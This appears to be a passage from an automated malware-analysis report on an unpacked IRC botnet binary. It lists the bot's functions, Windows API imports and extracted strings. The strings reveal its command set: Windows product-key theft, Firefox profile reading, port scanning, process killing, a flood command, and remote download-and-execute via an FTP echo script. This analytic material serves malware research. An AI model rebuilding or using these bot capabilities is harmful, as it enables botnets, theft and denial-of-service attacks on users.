	KERNEL32.MapViewOfFile
	USER32.SendMessageA
	KERNEL32.UnmapViewOfFile
	KERNEL32.CloseHandle</font>
<font color=brown>
	"mIRC"
</font></pre></td></tr><tr id="sub_4093BC"><td><pre><a name="sub_4093BC"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4093BC"><font size=+2>sub_4093BC</a>(e6ee)</font>:<font color=darkgreen>
	KERNEL32.GetCurrentProcess
	KERNEL32.CloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_406231"><td><pre><a name="sub_406231"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_406231"><font size=+2>sub_406231</a>(e88e)</font>:<font color=darkgreen>
	KERNEL32.GetCurrentProcess</font>
<font color=brown>
	"Application Data\\Mozilla\\Firefox"
	"\\"
	"\\profiles.ini"
	"r"
	"name=default"
	"path="
	"/"
</font></pre></td></tr><tr id="sub_401760"><td><pre><a name="sub_401760"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_401760"><font size=+2>sub_401760</a>(e91f)</font>:<font color=darkgreen>
	WS2_32.send</font>
<font color=brown></font></pre></td></tr><tr id="sub_40198E"><td><pre><a name="sub_40198E"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40198E"><font size=+2>sub_40198E</a>(ea92)</font>:<font color=darkgreen>
	KERNEL32.GetSystemDirectoryA
	KERNEL32.CreateThread
	NTDLL.RtlGetLastWin32Error
	KERNEL32.Sleep
	KERNEL32.GetTickCount
	WS2_32.WSACleanup
	KERNEL32.lstrcmpi
	WS2_32.inet_addr
	WS2_32.gethostbyaddr
	WS2_32.gethostbyname
	WS2_32.inet_ntoa
	KERNEL32.GetTempPathA
	KERNEL32.CreateProcessA</font>
<font color=brown>
	" :"
	" "
	"!"
	"PING"
	"PONG	%s\r\n"
	"JOIN	%s %s\r\n"
	"NOTICE"
	"pong"
	"PONG	%s\r\n"
	"001"
	"005"
	"302"
	"@"
	"433"
	"NICK	%s\r\n"
	"KICK"
	"user %s logged out."
	"NOTICE %s :%s\r\n"
	"JOIN	%s %s\r\n"
	"Nice Game Mr %s!"
	"NICK"
	":%s%s"
	"PART"
	"QUIT"
	"353"
	"j0in3d channel %s."
	"user %s logged out."
	"PART"
	"NOTICE %s :%s\r\n"
	"PRIVMSG"
	"NOTICE"
	"332"
	"NOTICE"
	"�"
	"!"
	"s"
	"s"
	"Ok You're Here."
	"user %s(%s) logged in."
	"332"
	" :"
	"$%d-"
	"$%d"
	"$me"
	"$user"
	"$chan"
	"$rndnick"
	"$server"
	"$chr("
	")"
	"63"
	" "
	"rnick"
	"NICK	%s\r\n"
	"winkey"
	"Found Key: %.29s"
	"killbot"
	"findbot"
	"Couldn't find Key"
	"die"
	"332"
	"logout"
	"user %s logged out.\r\n"
	"gftp"
	"svchost.exe"
	"password"
	"mircosoft"
	"ms.microsoft.com"
	"CFTP server: %s, port: %d, user: %s, pa"...
	"R.e.c.o.n.n.e.c.t"
	"QUIT :reconnecting"
	"d.i.s.c.o.n.n.e.c.t"
	"QUIT :later"
	"leave"
	"QUIT :later\r\n"
	"QUIT	:%s\r\n"
	"http"
	"Server listening on IP: http://%s:%d,	D"...
	"Failed to start server thread, error:	<"...
	"httpstop"
	"Server"
	"firefox"
	"info"
	"WMI Performance Adapter Services"
	"bawha"
	"t"
	"sub"
	"List threads."
	"Failed to start list thread, error: <%d"...
	"pst"
	"log"
	"system"
	"driver"
	"�"
	"Goin TO Hell :D"
	"stop"
	"Scan"
	"Scanner"
	"procs"
	"Already running."
	"full"
	"Failed to start listing thread, error: "...
	"sn"
	"on"
	"Already running."
	"Failed to start Shit thread, error: <%d"...
	"off"
	"Carnivore stopped. (%d thread(s) stoppe"...
	"No Shit thread found."
	"killproc"
	"Process killed: %s"
	"Failed to ki|| process: %s"
	"killid"
	"Process killed ID: %s"
	"Failed to ki|| process ID: %s"
	"FIND"
	"Too many specified."
	"%s"
	"Random"
	"Sequential"
	"%s Scanner on	%s:%d delay %d %d mins %d"...
	"Can not start	scanner"
	"p0rt invalid."
	"nick"
	"NICK	%s\r\n"
	"j"
	"p"
	"PART	%s\r\n"
	"r"
	"killth"
	"all"
	"Stopped: %d thread(s)."
	"No active threads found."
	"Killed thread: %s."
	"Fail3d to ki|| thread: %s."
	"open"
	"open"
	"file opened."
	"couldn't open file."
	"dns"
	"%s -> %s"
	"could	not resolve host"
	"mIRCMD"
	"Client not open."
	"pm"
	"act"
	"cyc"
	"332"
	"PART	%s\r\n"
	"JOIN	%s %s\r\n"
	"mode"
	"MODE	%s\r\n"
	"repeat"
	"332"
	"%s %s %s :%s"
	"delay"
	"332"
	"%s %s %s :%s"
	"au"
	"bawha"
	"%s%s.exe"
	"Getting Update From: %s."
	"Failed to start download thread, error:"...
	"SHit must be different than current run"...
	"exe"
	"couldn't execute file."
	"du"
	"Getting URL: %s to: %s."
	"Failed to start transfer, error: <%d>."
	"skybye"
	"Starting: (%s:%s) for	%s seconds."
	"Failed to start: <%d>."
	"find"
	"JOIN	%s %s\r\n"
	"p0rt is invalid."
	"%s"
	"no IP."
	"%s"
	"Random"
	"Sequential"
	"%s Scann3r on	%s:%d %d secs %d mins %d "...
	"sftp"
	"ms.microsoft.com"
	"mircosoft"
	"password"
	"svchost.exe"
	"JOIN	%s %s\r\n"
	"USERHOST %s\r\n"
</font></pre></td></tr><tr id="sub_4162D5"><td><pre><a name="sub_4162D5"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4162D5"><font size=+2>sub_4162D5</a>(eaec)</font>:<font color=darkgreen>
	KERNEL32.IsBadCodePtr</font>
<font color=brown></font></pre></td></tr><tr id="sub_417D91"><td><pre><a name="sub_417D91"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_417D91"><font size=+2>sub_417D91</a>(edbf)</font>:<font color=brown>
	"invalid string position"
</font></pre></td></tr><tr id="sub_4060C7"><td><pre><a name="sub_4060C7"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4060C7"><font size=+2>sub_4060C7</a>(ee0e)</font>:<font color=brown>
	"r"
</font></pre></td></tr><tr id="sub_4072DA"><td><pre><a name="sub_4072DA"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4072DA"><font size=+2>sub_4072DA</a>(f005)</font>:<font color=darkgreen>
	KERNEL32.CreateFileA
	KERNEL32.GetFileSize
	KERNEL32.SetFilePointer
	KERNEL32.ReadFile
	KERNEL32.CloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_41330B"><td><pre><a name="sub_41330B"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_41330B"><font size=+2>sub_41330B</a>(f38f)</font>:<font color=darkgreen>
	KERNEL32.WriteFile
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_40B1D5"><td><pre><a name="sub_40B1D5"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40B1D5"><font size=+2>sub_40B1D5</a>(f4ac)</font>:<font color=darkgreen>
	KERNEL32.Sleep</font>
<font color=brown>
	"svchost.exe"
	"password"
	"mircosoft"
	"ms.microsoft.com"
	"echo open %s %d > o&echo user	%s %s >> "...
	"%s\r\n"
</font></pre></td></tr><tr id="sub_40CCB2"><td><pre><a name="sub_40CCB2"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40CCB2"><font size=+2>sub_40CCB2</a>(f975)</font>:<font color=darkgreen>
	WS2_32.recv</font>
<font color=brown></font></pre></td></tr><tr id="sub_414D0D"><td><pre><a name="sub_414D0D"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414D0D"><font size=+2>sub_414D0D</a>(f9e3)</font>:<font color=darkgreen>
	KERNEL32.FlushFileBuffers
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_40A610"><td><pre><a name="sub_40A610"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A610"><font size=+2>sub_40A610</a>(face)</font>:<font color=darkgreen>
	WS2_32.getsockname
	KERNEL32.GlobalMemoryStatus
	KERNEL32.GetVersionExA
	KERNEL32.GetTickCount
	KERNEL32.GetComputerNameA
	ADVAPI32.GetUserNameA</font>
<font color=brown></font></pre></td></tr><tr id="sub_4150F4"><td><pre><a name="sub_4150F4"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4150F4"><font size=+2>sub_4150F4</a>(fdb6)</font>:<font color=darkgreen>
	NTDLL.RtlSizeHeap</font>
<font color=brown></font></pre></td></tr></table><script>
document.getElementById(window.location.href.split('#')[1]).setAttribute("style", "background-color:#ddddff");
</script>
</html>